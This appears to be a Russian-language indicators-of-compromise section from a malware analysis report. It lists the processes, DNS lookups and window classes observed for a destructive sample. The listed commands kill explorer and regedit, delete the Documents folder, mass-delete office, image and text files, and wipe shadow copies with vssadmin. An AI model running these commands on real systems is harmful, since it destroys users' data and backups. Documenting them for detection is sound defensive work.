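Техническая информация
Примечание: в этом фрагменте нет заголовков разделов, поэтому тип каждой записи (процесс, файл, сетевой запрос, окно) приходится определять по её содержанию; повторяющиеся строки, по-видимому, относились к разным разделам. Символы # в доменах и URL, судя по всему, скрывают часть адреса.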
- '%WINDIR%\syswow64\taskkill.exe' /f /im explorer.exe
- '%WINDIR%\syswow64\taskkill.exe' /f /im regedit.exe
- %WINDIR%\explorer.exe
- <Текущая директория>\congratulations.txt
- <Текущая директория>\congratulations.txt
- http://oc##.#tartssl.com/sub/class2/code/ca/MEMwQTA%2FMD0wOzAJBgUrDgMCGgUABBQSOgrhRCSnWfKxoWTjWxhk8hga9AQU0E4PQJlsuEsZbzsouODjiAc0qrcCAhAV
- DNS ASK yo##ube.com
- DNS ASK s.##img.com
- DNS ASK fo###.gstatic.com
- DNS ASK accounts.google.com
- DNS ASK ss#.#static.com
- DNS ASK oc##.#tartssl.com
- ClassName: '' WindowName: ''
- ClassName: 'DDEMLMom' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c echo off
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im explorer.exe
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im regedit.exe
- '%WINDIR%\syswow64\cmd.exe' /c start https://www.yo##ube.com/watch?v=###########
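- '%WINDIR%\syswow64\cmd.exe' /c RD /s /q %UserProfile%Documents
- '%WINDIR%\syswow64\cmd.exe' /c MD %UserProfile%Documents
- '%WINDIR%\syswow64\cmd.exe' /c RD /s /q C:WindowsMinidump
  (Примечание: в путях %UserProfile%Documents и C:WindowsMinidump нет обратной косой черты; по этой странице нельзя установить, так ли выглядела исходная командная строка или символ потерян при публикации. При поиске по журналам стоит учитывать оба варианта написания.)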
- '%WINDIR%\syswow64\cmd.exe' /c DEL /s /q *.DOC *.DOCX *.xls *.xlsx *.png *.txt
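- '%WINDIR%\syswow64\cmd.exe' /c vssadmin delete shadows /all /quiet
  (Примечание: эта команда удаляет все теневые копии томов, что затрудняет восстановление файлов; запуск vssadmin с такими аргументами — надёжный признак для обнаружения.)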
- '<SYSTEM32>\vssvc.exe'